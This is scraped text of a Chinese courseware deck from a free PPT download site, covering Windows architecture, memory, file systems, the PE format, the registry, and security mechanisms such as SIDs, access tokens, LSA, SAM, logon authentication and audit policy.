這是一個關(guān)于網(wǎng)絡(luò)信息安全論文PPT課件，主要介紹1.Windows操作系統(tǒng)簡介、Windows的安全結(jié)構(gòu)和機(jī)制、Windows系統(tǒng)遠(yuǎn)程攻擊/Windows系統(tǒng)本地攻擊。Windows系統(tǒng)安全攻防技術(shù)內(nèi)容 1.Windows操作系統(tǒng)簡介 2.Windows的安全結(jié)構(gòu)和機(jī)制 3.Windows系統(tǒng)遠(yuǎn)程攻擊 4.Windows系統(tǒng)本地攻擊桌面操作系統(tǒng)市場份額微軟Windows操作系統(tǒng)的市場占有率 Windows操作系統(tǒng)發(fā)展軌跡桌面(客戶端)操作系統(tǒng) 1990: Windows 3.x 1995-1999: Windows 95, 98, ME(4.x) 2000: Windows 2000 Pro(5.0.x) 2001: Windows XP(5.1.x) 2007: Windows Vista(6.0.x) 2009: Windows 7(6.1.x) 2012:Windows 8 (6.2.x) 服務(wù)器操作系統(tǒng) 1993: Windows NT (3.x, 4.x) 2000: Windows 2000 Server(5.0.x) 2003: Windows Server 2003 (5.2.x) 2008: Windows Server 2008 (6.x) Windows NT 5.x系列操作系統(tǒng) Windows 2000 Pro/Windows XP Windows 2000 Server/Windows Server 2003 簡化的Windows結(jié)構(gòu)簡化的Windows結(jié)構(gòu)注意到中間有一條線把Windows操作系統(tǒng)的用戶模式(user mode)和內(nèi)核模式(kernel mode )兩部分劃分開來。線上面的方框代表了用戶模式的進(jìn)程，線之下的組件是內(nèi)核模式的操作系統(tǒng)服務(wù)。用戶模式的線程在一個受保護(hù)的進(jìn)程地址空間中執(zhí)行(不過，當(dāng)它們在內(nèi)核模式中執(zhí)行的時候，它們可以訪問系統(tǒng)空間)，歡迎點(diǎn)擊下載網(wǎng)絡(luò)信息安全論文PPT課件哦。

網(wǎng)絡(luò)信息安全論文PPT課件是由紅軟PPT免費(fèi)下載網(wǎng)推薦的一款學(xué)校PPT類型的PowerPoint.

Windows系統(tǒng)安全攻防技術(shù)內(nèi)容 1.Windows操作系統(tǒng)簡介 2.Windows的安全結(jié)構(gòu)和機(jī)制 3.Windows系統(tǒng)遠(yuǎn)程攻擊 4.Windows系統(tǒng)本地攻擊桌面操作系統(tǒng)市場份額微軟Windows操作系統(tǒng)的市場占有率 Windows操作系統(tǒng)發(fā)展軌跡桌面(客戶端)操作系統(tǒng) 1990: Windows 3.x 1995-1999: Windows 95， 98， ME(4.x) 2000: Windows 2000 Pro(5.0.x) 2001: Windows XP(5.1.x) 2007: Windows Vista(6.0.x) 2009: Windows 7(6.1.x) 2012:Windows 8 (6.2.x) 服務(wù)器操作系統(tǒng) 1993: Windows NT (3.x， 4.x) 2000: Windows 2000 Server(5.0.x) 2003: Windows Server 2003 (5.2.x) 2008: Windows Server 2008 (6.x) Windows NT 5.x系列操作系統(tǒng) Windows 2000 Pro/Windows XP Windows 2000 Server/Windows Server 2003 簡化的Windows結(jié)構(gòu)簡化的Windows結(jié)構(gòu)注意到中間有一條線把Windows操作系統(tǒng)的用戶模式(user mode)和內(nèi)核模式(kernel mode )兩部分劃分開來。線上面的方框代表了用戶模式的進(jìn)程，線之下的組件是內(nèi)核模式的操作系統(tǒng)服務(wù)。用戶模式的線程在一個受保護(hù)的進(jìn)程地址空間中執(zhí)行(不過，當(dāng)它們在內(nèi)核模式中執(zhí)行的時候，它們可以訪問系統(tǒng)空間)。因此，系統(tǒng)支持進(jìn)程、服務(wù)進(jìn)程、用戶應(yīng)用程序和環(huán)境子系統(tǒng)都有它們各自的私有進(jìn)程地址空間�；�本的用戶模式進(jìn)程(1) 固定的(或者硬性指定的)系統(tǒng)支持進(jìn)程(system support processes)，比如登錄(logon)進(jìn)程和會話管理器(session manager )，它們并不是Windows的服務(wù)。也就是說，它們不是由服務(wù)控制管理器來啟動的基本的用戶模式進(jìn)程(2) 服務(wù)進(jìn)程(service processes)負(fù)責(zé)的是Windows服務(wù)，比如任務(wù)調(diào)度器(Task Scheduler )和假脫機(jī)服務(wù) Windows服務(wù)的運(yùn)行通常要獨(dú)立于用戶登錄。許多Windows服務(wù)器應(yīng)用，比如Microsoft SQL Server和Microsoft Exchange Server，也包含了一些以Windows服務(wù)方式來運(yùn)行的組件； 基本的用戶模式進(jìn)程(3) 用戶應(yīng)用程序(user applications )有六種類型 Windows 32位 Windows 64位 Windows 3.1 16 位 MS-DOS 16位 POSIX 32位 OS/2 32位；基本的用戶模式進(jìn)程(4) 環(huán)境子系統(tǒng)服務(wù)器進(jìn)程(environment subsystem server processes)實(shí)現(xiàn)了操作系統(tǒng)環(huán)境的支持部分。所謂的環(huán)境是指操作系統(tǒng)展示給用戶或者程序員的個性化部分。 Windows NT發(fā)布時帶了三個不同的環(huán)境子系統(tǒng)：Windows、POSIX和OS/2 Windows XP，在基本的產(chǎn)品中只有 Windows子系統(tǒng)隨產(chǎn)品一起發(fā)布——不過，一個增強(qiáng)的POSIX 子系統(tǒng)也可以使用，它是針對Unix產(chǎn)品的免費(fèi)服務(wù)的一部分。核心子系統(tǒng)DLL 在Windows下，用戶應(yīng)用程序并不直接調(diào)用原始的Windows操作系統(tǒng)服務(wù)，相反，它們通過一個或者多個子系統(tǒng)動態(tài)鏈接庫(DLLs)來發(fā)起調(diào)用。子系統(tǒng)DLL 的角色是，將一個已文檔化的函數(shù)轉(zhuǎn)化為一些恰當(dāng)?shù)膬?nèi)部(通常是未文檔化的)Windows系統(tǒng)服務(wù)調(diào)用。 Windows的內(nèi)核模式組件(1) Windows執(zhí)行體(executive )包含了基本的操作系統(tǒng)服務(wù)，比如內(nèi)存管理、進(jìn)程和線程管理、安全性、I/O、網(wǎng)絡(luò)和跨進(jìn)程通信。 Windows的內(nèi)核模式組件(2) Windows內(nèi)核(kernel )是由一組低層次的操作系統(tǒng)功能構(gòu)成的，比如線程調(diào)度(thread scheduling)、中斷(interrupt )和異常分發(fā)(exception dispatching )，以及多處理器同步。它也提供了一組例程和基本對象。執(zhí)行體的其余部分利用這些例程和對象實(shí)現(xiàn)更高層次的功能。執(zhí)行體對象和內(nèi)核對象 Windows的內(nèi)核模式組件(3) 設(shè)備驅(qū)動程序(device drivers )既包括硬件設(shè)備驅(qū)動程序，也包括文件系統(tǒng)和網(wǎng)絡(luò)驅(qū)動程序。其中硬件設(shè)備驅(qū)動程序?qū)⒂脩舻腎/O 函數(shù)調(diào)用轉(zhuǎn)換成特定的硬件設(shè)備I/O 請求。 Windows的內(nèi)核模式組件(4) 硬件抽象層(HAL，Hardware Abstraction Layer)是指一層特殊的代碼，它把內(nèi)核、設(shè)備驅(qū)動程序和Windows執(zhí)行體的其余部分，跟與平臺相關(guān)的硬件差異(比如不同主板的差異)隔離開來。 Windows的內(nèi)核模式組件(5) 窗口和圖形系統(tǒng)(windowing and graphic system )實(shí)現(xiàn)了圖形用戶界面(GUI )函數(shù)(更為人們熟知的叫法是Windows USER和GDI 函數(shù))，比如對窗口的處理、用戶界面控件，以及繪制等。 Windows系統(tǒng)核心結(jié)構(gòu)和組件 Windows的進(jìn)程和線程管理 Windows下的進(jìn)程和線程可執(zhí)行程序: 靜態(tài)指令序列進(jìn)程：一個容器，包含至少一個執(zhí)行線程線程：進(jìn)程內(nèi)部的指令執(zhí)行實(shí)體 Windows進(jìn)程 Windows進(jìn)程的組成(從最高抽象層次看) 一個私有的虛擬地址空間一個可執(zhí)行的程序，定義了代碼和數(shù)據(jù)，并被映射到進(jìn)程的虛擬地址空間一個已經(jīng)打開句柄的列表指向各種資源，比如信號量、文件，該進(jìn)程的所有線程都可訪問這些系統(tǒng)資源一個被稱為訪問令牌的安全環(huán)境標(biāo)識與該進(jìn)程關(guān)聯(lián)的用戶、安全組和特權(quán)一個被稱為進(jìn)程ID的唯一標(biāo)識至少一個執(zhí)行線程 Windows進(jìn)程 Windows進(jìn)程的關(guān)鍵數(shù)據(jù)結(jié)構(gòu)執(zhí)行體進(jìn)程塊(EPROCESS， Executive Process Block) 執(zhí)行體進(jìn)程對象的對象體，包括進(jìn)程ID、父進(jìn)程ID、程序名、進(jìn)程優(yōu)先級、內(nèi)存管理信息、設(shè)備映像等。核心進(jìn)程塊(KPROCESS， Kernel Process Block) 內(nèi)核進(jìn)程對象的對象體，又稱PCB，包括線程調(diào)度時需要的信息，如進(jìn)程狀態(tài)、線程時間片等。進(jìn)程環(huán)境塊(PEB， Process Environment Block) 包括用戶態(tài)代碼需要和修改的信息。 Windows環(huán)境子系統(tǒng)核心態(tài)部件win32k.sys為每個進(jìn)程建立的進(jìn)程信息數(shù)據(jù)結(jié)構(gòu)WIN32KPROCESS Windows環(huán)境子系統(tǒng)進(jìn)程csrss(用戶態(tài)空間)為每個進(jìn)程建立的進(jìn)程信息數(shù)據(jù)結(jié)構(gòu) Windows線程組成線程的基本部件一組代表處理器狀態(tài)的CPU寄存器中的內(nèi)容兩個棧一個用于當(dāng)線程在內(nèi)核模式下執(zhí)行的時候，另一個用于線程在用戶模式下執(zhí)行的時候。一個被稱為線程局部存儲區(qū)(TLS， Thread Local Storage)的私有存儲區(qū)域各個子系統(tǒng)、運(yùn)行庫和DLL都會用到該存儲區(qū)域一個被稱為線程ID的唯一標(biāo)識符安全環(huán)境 Windows線程 Windows線程的關(guān)鍵數(shù)據(jù)結(jié)構(gòu)執(zhí)行體線程塊(ETHREAD， Executive Thread Block) 執(zhí)行體線程對象的對象體，包括：進(jìn)程ID、起始執(zhí)行地址、訪問令牌、LPC消息、定時器信息、KTHREAD等。核心線程塊(KTHREAD， Kernel Thread Block) 內(nèi)核線程對象的對象體，包括線程調(diào)度信息、同步信息、核心棧信息等。線程環(huán)境塊(TEB， Thread Environment Block) 包括用戶態(tài)代碼需要和修改的信息。 Windows環(huán)境子系統(tǒng)核心態(tài)部件win32k.sys為每個線程建立的線程信息數(shù)據(jù)結(jié)構(gòu)WIN32THREAD Windows環(huán)境子系統(tǒng)進(jìn)程csrss(用戶態(tài)空間)為每個線程建立的線程信息數(shù)據(jù)結(jié)構(gòu) Windows進(jìn)程線程模型 Windows進(jìn)程線程模型 Windows進(jìn)程線程內(nèi)部數(shù)據(jù)結(jié)構(gòu) EPEOCESS & KPROCESS Windows進(jìn)程線程內(nèi)部數(shù)據(jù)結(jié)構(gòu) PEB Windows進(jìn)程線程內(nèi)部數(shù)據(jù)結(jié)構(gòu) ETHREAD & KTHREAD Windows進(jìn)程線程內(nèi)部數(shù)據(jù)結(jié)構(gòu) TEB Windows進(jìn)程的創(chuàng)建過程與進(jìn)程相關(guān)的函數(shù) Windows的內(nèi)存管理 Windows虛擬地址空間 Windows系統(tǒng)核心內(nèi)存區(qū)間 Windows內(nèi)存空間 Windows虛擬地址空間虛擬地址空間(Virtual address space) A set of virtual memory addresses that a process can use. 特點(diǎn)平面(線形)空間大小和物理內(nèi)存無關(guān)每個進(jìn)程擁有的私有地址空間，其他的進(jìn)程在未經(jīng)允許的條件下不能訪問此地址空間 Windows虛擬地址空間 32-bit x86 地址空間虛擬地址空間最大為4GB Windows虛擬地址空間 Windows虛擬地址空間 64-bit Address Spaces Windows內(nèi)存管理器 Windows的內(nèi)存管理器是執(zhí)行體(Executive)的一部分，位于文件Ntoskrnl.exe中 Windows內(nèi)存管理器內(nèi)存管理器的主要任務(wù)將一個進(jìn)程的虛擬地址空間映射到物理內(nèi)存中(mapping)。數(shù)據(jù)交換(swap)。當(dāng)物理內(nèi)存被過度使用時，將內(nèi)存中的一些內(nèi)容轉(zhuǎn)移到磁盤上；并且，在以后需要這些內(nèi)容時，再將它們讀回到物理內(nèi)存中。 Windows內(nèi)存管理器內(nèi)存管理器提供的服務(wù)(面向用戶) 分配和釋放虛擬內(nèi)存進(jìn)程之間共享內(nèi)存將文件映射到內(nèi)存將虛擬頁面刷新到內(nèi)存獲得虛擬頁面的信息改變虛擬頁面的保護(hù)屬性將虛擬頁面鎖在內(nèi)存 …… Windows的內(nèi)存管理方案 Windows內(nèi)存管理采用的是虛擬頁式管理方案，默認(rèn)情況下，每個頁面大小為4KB。 Windows頁面組織方式(二級頁表結(jié)構(gòu)) 頁表(Page Table): A page of mapping information Windows的內(nèi)存管理方案頁目錄(Page directory) Windows的內(nèi)存管理方案 Windows虛擬地址變換 x86系統(tǒng)32位虛擬地址結(jié)構(gòu) Windows虛擬地址變換地址變換過程(x86系統(tǒng)) Windows頁面錯誤在頁面表換該過程中，可能會發(fā)現(xiàn)PTE的有效位被清除的情況，這表明出于某種原因，該頁面無法被當(dāng)前進(jìn)程訪問。在此對一個無效頁面的引用被稱為頁面錯誤(page fault) 引發(fā)錯誤的原因缺頁頁面在內(nèi)存，但在備用或修改隊(duì)列中訪問違例 …… Windows頁面錯誤缺頁錯誤的處理方法采用請求調(diào)頁和頁簇化技術(shù)當(dāng)發(fā)生缺頁中斷時，windows內(nèi)存管理器將所需頁面及其之前或之后的少量頁面一起加載到內(nèi)存中。根據(jù)程序行為局部性理論，這種頁簇化技術(shù)可以減少缺頁中斷次數(shù)。 Windows系統(tǒng)中如果缺頁的原因是因?yàn)橐�用�?shù)據(jù)頁面錯誤，則簇的大小為3，否則為7。不同的 Windows 版本支持內(nèi)存數(shù) Win32 Process memory Windows文件系統(tǒng):FAT12，F(xiàn)AT16，F(xiàn)AT32 FAT（File Allocation Table，文件分配表）文件系統(tǒng)屬遺產(chǎn)文件系統(tǒng)。為了向后兼容，也為了方便用戶升級，Windows 2000/XP仍然提供對FAT的支持 每一種FAT文件系統(tǒng)都用一個數(shù)字來標(biāo)識磁盤上簇號的位數(shù)。例如，F(xiàn)AT12的簇標(biāo)識為12位（二進(jìn)制數(shù)），這限制了它的單個分區(qū)最多只能存儲2 12（=4096）個簇，而FAT 12在Windows 2000/XP中的簇大小在512B與8KB之間，這意味著FAT12卷的大小至多只有32M。 FAT卷的結(jié)構(gòu): Boot Sector + FAT1 + FAT2 +Root +Other dirs and files FSD:\Winnt\System32\Drivers\Fastfat.sys Windows 2000/XP文件系統(tǒng)：NTFS NTFS是Windows 2000/XP的首選文件系統(tǒng) NTFS的簇標(biāo)識為64位（二進(jìn)制數(shù)）（但是Windows 2000有限制）文件與目錄的安全性文件與目錄的壓縮文件與目錄的加密文件與目錄的可恢復(fù)性。 NTFS系統(tǒng) NTFS的卷結(jié)構(gòu) NTFS卷中的文件名 使用NTFS文件系統(tǒng)管理資源 PE: Portable Executable 可移植的可執(zhí)行文件 (PE) 是一種用于可執(zhí)行文件、目標(biāo)文件和動態(tài)鏈接庫的文件格式，主要使用在32位和64位的Windows操作系統(tǒng)上。 “可移植的”是指該文件格式的通用性，可用于許多種不同的操作系統(tǒng)和體系結(jié)構(gòu)中。 PE文件格式封裝了Windows操作系統(tǒng)加載可執(zhí)行程序代碼時所必需的一些信息。這些信息包括動態(tài)鏈接庫、API導(dǎo)入和導(dǎo)出表、資源管理數(shù)據(jù)和線程局部存儲數(shù)據(jù)。 PE文件格式主要用于.exe文件、.dll文件、.sys（驅(qū)動程序）和其他文件類型(.cpl， .ocx， .scr， .drv)。 PE文件格式總結(jié)整個PE格式的組成：一個MS-DOS 的MZ 頭部，之后是一個實(shí)模式的殘余程序、PE 文件標(biāo)志、PE 文件頭部、PE 可選頭部、所有的段頭部，最后是所有的段實(shí)體�？蛇x頭部的末尾是一個數(shù)據(jù)目錄入口的數(shù)組，這些相對虛擬地址指向段實(shí)體之中的數(shù)據(jù)目錄。每個數(shù)據(jù)目錄都表示了一個特定的段實(shí)體數(shù)據(jù)是如何組織的。 PE 文件格式有9個預(yù)定義段，每個應(yīng)用程序可以為它自己的代碼以及數(shù)據(jù)定義它自己獨(dú)特的段。 .debug 預(yù)定義段也可以分離為一個單獨(dú)的調(diào)試文件。如果這樣的話，就會有一個特定的調(diào)試頭部來用于解析這個調(diào)試文件，PE 文件中也會有一個標(biāo)志來表示調(diào)試數(shù)據(jù)被分離了出去。 Windows系統(tǒng)的注冊表 Windows系統(tǒng)注冊表 Windows配置和控制方面關(guān)鍵角色系統(tǒng)全局配置的存儲倉庫每個用戶配置信息的存儲倉庫注冊表查找編輯工具 Regedit.exe 注冊表的讀寫讀取: 系統(tǒng)引導(dǎo)過程， 系統(tǒng)登錄過程， 應(yīng)用程序啟動過程修改: 缺省安裝， 應(yīng)用程序安裝， 設(shè)備驅(qū)動安裝， 修改應(yīng)用程序配置注冊表在文件系統(tǒng)上的存儲(Hive) HKLM\SYSTEM\CurrentControlSet\Control\hivelist 注冊表監(jiān)視工具 RegMon 注冊表ASEP點(diǎn)自動啟動可擴(kuò)展點(diǎn) (ASEP) ASEP 可讓程序不經(jīng)用戶操作即可啟動。一個 ASEP 可以接受一個或多個 ASEP 掛鉤，其中每個 ASEP 掛鉤與一個程序關(guān)聯(lián)。注冊表ASEP點(diǎn)經(jīng)常被惡意代碼/攻擊者利用 Windows網(wǎng)絡(luò)體系結(jié)構(gòu)網(wǎng)絡(luò)驅(qū)動程序接口規(guī)范層 NDIS Network Driver Interface Specification (NDIS) Layer NDIS提供從網(wǎng)絡(luò)傳輸系統(tǒng)到物理設(shè)備（如網(wǎng)絡(luò)適配器）的通信路徑。 NDIS扮演著網(wǎng)絡(luò)適配器和網(wǎng)絡(luò)協(xié)議之間的邊界層角色，管理這些組件之間的綁定工作。 NDIS增加了對面向連接網(wǎng)絡(luò)介質(zhì)(例如ATM和ISDN)的支持，并繼續(xù)支持傳統(tǒng)的無連接網(wǎng)絡(luò)介質(zhì)，如以太網(wǎng)、令牌環(huán)網(wǎng)、FDDI等。 NDIS包含直接和網(wǎng)絡(luò)適配器連接的微端口驅(qū)動程序。網(wǎng)絡(luò)協(xié)議層 Network Protocol Layer 網(wǎng)絡(luò)協(xié)議為客戶機(jī)提供服務(wù)，這些服務(wù)允許應(yīng)用程序或客戶機(jī)通過網(wǎng)絡(luò)發(fā)送數(shù)據(jù)。網(wǎng)絡(luò)協(xié)議包括TCP/IP、ATM、IPX/SPX、NetBEUI、IrDA、AppleTalk和DLC。通過Microsoft的SNA Server，也可應(yīng)用系統(tǒng)網(wǎng)絡(luò)體系結(jié)構(gòu)(SNA)協(xié)議。傳輸驅(qū)動程序接口層 Transport Driver Interface Layer 傳輸驅(qū)動程序接口(TDI)在網(wǎng)絡(luò)協(xié)議和協(xié)議客戶機(jī)(如應(yīng)用程序、網(wǎng)絡(luò)重定向器或網(wǎng)絡(luò)應(yīng)用編程接口API)間提供了一個標(biāo)準(zhǔn)接口。網(wǎng)絡(luò)應(yīng)用編程接口層 Network Application Programming Interface Layer 網(wǎng)絡(luò)應(yīng)用編程接口API為網(wǎng)絡(luò)應(yīng)用和服務(wù)提供標(biāo)準(zhǔn)編程接口。支持Winsock、NetBIOS、電話API(TAPI)、消息API(MAPI)、WNet API和其他服務(wù)。進(jìn)程間通信層 Interprocess Communications Layer 進(jìn)程間通信(IPC)支持客戶機(jī)/服務(wù)器計算和分布式處理。它們支持的服務(wù)有遠(yuǎn)程過程調(diào)用(RPC)、分布式組件對象模型(DCOM)、命名管道、郵筒(mailslot)和通用Internet文件系統(tǒng)(CIFS)�；�本網(wǎng)絡(luò)服務(wù)層 Basic Network Services Layer 基本網(wǎng)絡(luò)服務(wù)層通過提供服務(wù)支持網(wǎng)絡(luò)用戶的應(yīng)用程序。服務(wù)包括網(wǎng)絡(luò)地址管理、名字服務(wù)、文件服務(wù)和高級網(wǎng)絡(luò)服務(wù)，例如IPSec和QoS。 Windows的安全結(jié)構(gòu)和機(jī)制 Windows安全性設(shè)計目標(biāo)一致的、健壯的、基于對象的安全模型滿足商業(yè)用戶的安全需求， 達(dá)到CC評估標(biāo)準(zhǔn)EAL4 AAA: 身份驗(yàn)證、授權(quán)、審計一臺機(jī)器上多個用戶之間安全地共享資源進(jìn)程，內(nèi)存，設(shè)備，文件，網(wǎng)絡(luò)安全模型服務(wù)器管理和保護(hù)各種對象客戶通過服務(wù)器訪問對象服務(wù)器扮演客戶，訪問對象訪問的結(jié)果返回給服務(wù)器攻擊者目標(biāo)在擁有最高權(quán)限的用戶帳戶環(huán)境中執(zhí)行命令。引用監(jiān)控器模型引用監(jiān)控器與其他安全措施的關(guān)系模型 Windows 基礎(chǔ)的安全機(jī)制基于引用監(jiān)控器經(jīng)典安全模型核心：內(nèi)核中的SRM 安全引用監(jiān)控器用戶態(tài)中的LSASS(Local Security Authority Subsystem Service)安全服務(wù)其他 Winlogon/Netlogon/Eventlog 實(shí)現(xiàn)對主體用戶的身份認(rèn)證機(jī)制、對所有對象的訪問控制機(jī)制，以及對訪問的安全審計機(jī)制 Winlogo進(jìn)程與LSASS中的Netlogon分別負(fù)責(zé)Windows本地和遠(yuǎn)程登錄用戶的身份認(rèn)證，利用LSASS所提供的身份驗(yàn)證服務(wù)，來確定安全主體身份的真實(shí)性。 內(nèi)核中的安全引用監(jiān)控器，根據(jù)LSASS服務(wù)配置的安全訪問控制策略，負(fù)責(zé)對所有安全主題訪問Windows資源對象的授權(quán)訪問控制 安全引用監(jiān)控器根據(jù)LSASS服務(wù)配置的安全審計策略，對訪問過程中關(guān)注的事件進(jìn)行記錄，并由EventLog生成系統(tǒng)審計日志。 Windows系統(tǒng)的安全組件訪問控制的判斷（Discretion access control） 允許對象所有者可以控制誰被允許訪問該對象以及訪問的方式。 對象重用（Object reuse） 當(dāng)資源（內(nèi)存、磁盤等）被某應(yīng)用訪問時，Windows 禁止所有的系統(tǒng)應(yīng)用訪問該資源，這也就是為什么無法恢復(fù)已經(jīng)被刪除的文件的原因。 強(qiáng)制登錄（Mandatory log on） 要求所有的用戶必須登錄，通過認(rèn)證后才可以訪問資源審核（Auditing） 在控制用戶訪問資源的同時，也可以對這些訪問作了相應(yīng)的記錄。對象的訪問控制（Control of access to object） 不允許直接訪問系統(tǒng)的某些資源。必須是該資源允許被訪問，然后是用戶或應(yīng)用通過第一次認(rèn)證后再訪問。 Windows安全子系統(tǒng)的組件 安全標(biāo)識符（Security Identifiers）: 就是我們經(jīng)常說的SID，每次當(dāng)我們創(chuàng)建一個用戶或一個組的時候，系統(tǒng)會分配給改用戶或組一個唯一SID，當(dāng)你重新安裝系統(tǒng)后，也會得到一個唯一的SID。 SID永遠(yuǎn)都是唯一的，由計算機(jī)名、當(dāng)前時間、當(dāng)前用戶態(tài)線程的CPU耗費(fèi)時間的總和三個參數(shù)決定以保證它的唯一性。 例： S-1-5-21-1763234323-3212657521-1234321321-500 訪問令牌（Access tokens）: 用戶通過驗(yàn)證后，登陸進(jìn)程會給用戶一個訪問令牌，該令牌相當(dāng)于用戶訪問系統(tǒng)資源的票證，當(dāng)用戶試圖訪問系統(tǒng)資源時，將訪問令牌提供給Windows 系統(tǒng)，然后Windows NT檢查用戶試圖訪問對象上的訪問控制列表。如果用戶被允許訪問該對象，系統(tǒng)將會分配給用戶適當(dāng)?shù)脑L問權(quán)限。 訪問令牌是用戶在通過驗(yàn)證的時候有登陸進(jìn)程所提供的，所以改變用戶的權(quán)限需要注銷后重新登陸，重新獲取訪問令牌。 Windows安全子系統(tǒng)的組件安全描述符（Security descriptors）： Windows 系統(tǒng)中的任何對象的屬性都有安全描述符這部分。它保存對象的安全配置。訪問控制列表（Access control lists）： 訪問控制列表有兩種：任意訪問控制列表（Discretionary ACL）、系統(tǒng)訪問控制列表（System ACL）。任意訪問控制列表包含了用戶和組的列表，以及相應(yīng)的權(quán)限，允許或拒絕。每一個用戶或組在任意訪問控制列表中都有特殊的權(quán)限。而系統(tǒng)訪問控制列表是為審核服務(wù)的，包含了對象被訪問的時間。訪問控制項(xiàng)（Access control entries）: 訪問控制項(xiàng)（ACE）包含了用戶或組的SID以及對象的權(quán)限。訪問控制項(xiàng)有兩種：允許訪問和拒絕訪問。拒絕訪問的級別高于允許訪問。 Windows 安全子系統(tǒng) Windows安全子系統(tǒng) Winlogon and Gina: Winlogon調(diào)用GINA DLL，并監(jiān)視安全認(rèn)證序列。而GINA DLL提供一個交互式的界面為用戶登陸提供認(rèn)證請求。GINA DLL被設(shè)計成一個獨(dú)立的模塊，當(dāng)然我們也可以用一個更加強(qiáng)有力的認(rèn)證方式（指紋、視網(wǎng)膜）替換內(nèi)置的GINA DLL。 Winlogon在注冊表中查找\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ，如果存在GinaDLL鍵，Winlogon將使用這個DLL，如果不存在該鍵，Winlogon將使用默認(rèn)值MSGINA.DLL Windows安全子系統(tǒng)本地安全認(rèn)證（Local Security Authority）： 本地安全認(rèn)證（LSA）是一個被保護(hù)的子系統(tǒng)，它負(fù)責(zé)以下任務(wù)：調(diào)用所有的認(rèn)證包，檢查在注冊表\HKLM\SYSTEM\CurrentControlSet\Control\LSA下AuthenticationPAckages下的值，并調(diào)用該DLL進(jìn)行認(rèn)證（MSV_1.DLL）。在4.0版里，Windows NT會尋找\HKLM\SYSTEM\CurrentControlSet\Control\LSA 下所有存在的SecurityPackages值并調(diào)用。重新找回本地組的SIDs和用戶的權(quán)限。創(chuàng)建用戶的訪問令牌。管理本地安裝的服務(wù)所使用的服務(wù)賬號。儲存和映射用戶權(quán)限。管理審核的策略和設(shè)置。管理信任關(guān)系。 Windows安全子系統(tǒng)安全支持提供者的接口（Security Support Provide Interface）： 微軟的Security Support Provide Interface很簡單地遵循RFC 2743和RFC 2744的定義，提供一些安全服務(wù)的API，為應(yīng)用程序和服務(wù)提供請求安全的認(rèn)證連接的方法。 認(rèn)證包（Authentication Package）： 認(rèn)證包可以為真實(shí)用戶提供認(rèn)證。通過GINA DLL的可信認(rèn)證后，認(rèn)證包返回用戶的SIDs給LSA，然后將其放在用戶的訪問令牌中。 Windows安全子系統(tǒng)安全支持提供者（Security Support Provider）： 安全支持提供者是以驅(qū)動的形式安裝的，能夠?qū)崿F(xiàn)一些附加的安全機(jī)制，默認(rèn)情況下，Windows NT安裝了以下三種： Msnsspc.dll：微軟網(wǎng)絡(luò)挑戰(zhàn)/反應(yīng)認(rèn)證模塊 Msapsspc.dll：分布式密碼認(rèn)證挑戰(zhàn)/反應(yīng)模塊，該模塊也可以在微軟網(wǎng)絡(luò)中使用 Schannel.dll：該認(rèn)證模塊使用某些證書頒發(fā)機(jī)構(gòu)提供的證書來進(jìn)行驗(yàn)證，常見的證書機(jī)構(gòu)比如Verisign。這種認(rèn)證方式經(jīng)常在使用SSL（Secure Sockets Layer）和PCT（Private Communication Technology）協(xié)議通信的時候用到。 Windows安全子系統(tǒng)網(wǎng)絡(luò)登錄（Netlogon）： 網(wǎng)絡(luò)登錄服務(wù)必須在通過認(rèn)證后建立一個安全的通道。要實(shí)現(xiàn)這個目標(biāo)，必須通過安全通道與域中的域控制器建立連接，然后，再通過安全的通道傳遞用戶的口令，在域的域控制器上響應(yīng)請求后，重新取回用戶的SIDs和用戶權(quán)限。 安全賬號管理者（Security Account Manager）： 安全賬號管理者，也就是我們經(jīng)常所說的SAM，它是用來保存用戶賬號和口令的數(shù)據(jù)庫。保存了注冊表中\(zhòng)HKLM\Security\Sam中的一部分內(nèi)容。不同的域有不同的Sam，在域復(fù)制的過程中，Sam包將會被拷貝。 Windows的密碼系統(tǒng) Windows NT及Win2000中對用戶帳戶的安全管理使用了安全帳號管理器(security account manager)的機(jī)制，安全帳號管理器對帳號的管理是通過安全標(biāo)識進(jìn)行的，安全標(biāo)識在帳號創(chuàng)建時就同時創(chuàng)建，一旦帳號被刪除，安全標(biāo)識也同時被刪除。安全標(biāo)識是唯一的，即使是相同的用戶名，在每次創(chuàng)建時獲得的安全標(biāo)識都時完全不同的。因此，一旦某個帳號被刪除，它的安全標(biāo)識就不再存在了，即使用相同的用戶名重建帳號，也會被賦予不同的安全標(biāo)識，不會保留原來的權(quán)限。 Windows登錄驗(yàn)證模型 Windows NT/2000/XP的系統(tǒng)登錄過程登錄是通過登錄進(jìn)程WinLogon、LSA、一個或多個身份認(rèn)證包和SAM的相互作用發(fā)生的身份認(rèn)證包：執(zhí)行身份驗(yàn)證檢查的動態(tài)鏈接庫。 Msvl_0：用于交互式登錄的身份認(rèn)證包 WinLogon：一個受托進(jìn)程，負(fù)責(zé)管理與安全性相關(guān)的用戶相互作用是從鍵盤截取登錄請求的唯一進(jìn)程 Windows登錄驗(yàn)證過程（以NT為例） Windows遠(yuǎn)程登錄身份驗(yàn)證早期：SMB驗(yàn)證協(xié)議，在網(wǎng)絡(luò)上傳輸明文口令 LM LM Manager Challenge/Response驗(yàn)證機(jī)制 驗(yàn)證機(jī)制簡單，容易被破解 NTLM Windows NT挑戰(zhàn)/響應(yīng)驗(yàn)證機(jī)制 NTLM v2 Kerberos Network Authentication，以NTLM為例 Windows安全技術(shù) Windows NT/2000/XP中的常用安全技術(shù) Windows身份驗(yàn)證與訪問控制 Windows審核機(jī)制 Windows注冊表 Windows加密文件系統(tǒng) Windows基準(zhǔn)安全注意事項(xiàng) Windows Audit機(jī)制 Windows 2000默認(rèn)安裝沒有打開任何安全審計 控制面板 管理工具 本地安全策略 本地策略 審計策略以賬戶管理事件為例創(chuàng)建（624）和啟用（626）賬戶更改賬戶密碼（627，628）更改賬戶狀態(tài)（629，630）對安全組的修改（632，633；636，637）賬戶鎖定（644，642） 一旦打開上述審計事件，安全審計就會將相關(guān)事件在事件查看器的日志中記錄下來修改審計策略后，要重啟機(jī)器。對文件和文件夾的審計必要條件 NTFS 打開“對象訪問”事件審核策略 審核設(shè)置步驟 ”右鍵“待審核文件文件夾，”屬性“”安全“”高級“”審核”“添加”“確定” 選擇“審核項(xiàng)目” 